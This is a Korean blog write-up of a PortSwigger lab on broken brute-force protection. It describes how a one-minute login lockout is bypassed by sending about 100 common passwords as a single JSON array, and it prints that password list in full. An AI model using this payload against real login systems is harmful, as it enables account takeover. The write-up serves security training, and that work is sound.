반응형
문제 설명
Carlos의 계정으로 로그인에 성공하면 문제가 해결된다.
문제 풀이
로그인 실패 시 Invalid username or password 에러가 발생한다.
password를 브루트 포스 공격한 결과 1분 동안 로그인 차단이 된다.
다음과 같이 비밀번호를 리스트 형식으로 여러 패스워드를 전송할 경우 로그인에 성공하였다.
["123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football", "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx", "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000", "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars", "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper", "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777", "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua", "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea", "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin", "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring", "montana", "moon", "moscow"]
carlos 계정으로 로그인에 성공하여 문제가 해결되었다.
반응형
'WEB hacking > PortSwigger' 카테고리의 다른 글
| Lab: Password reset broken logic 문제 풀이(WriteUp) (0) | 2025.07.01 |
|---|---|
| Lab: 2FA simple bypass 문제 풀이(WriteUp) (0) | 2025.06.30 |
| Lab: Username enumeration via account lock 문제 풀이(WriteUp) (0) | 2025.06.28 |
| Lab: Broken brute-force protection, IP block 문제 풀이(WriteUp) (0) | 2025.06.27 |
| Lab: Username enumeration via response timing 문제 풀이(WriteUp) (0) | 2025.06.26 |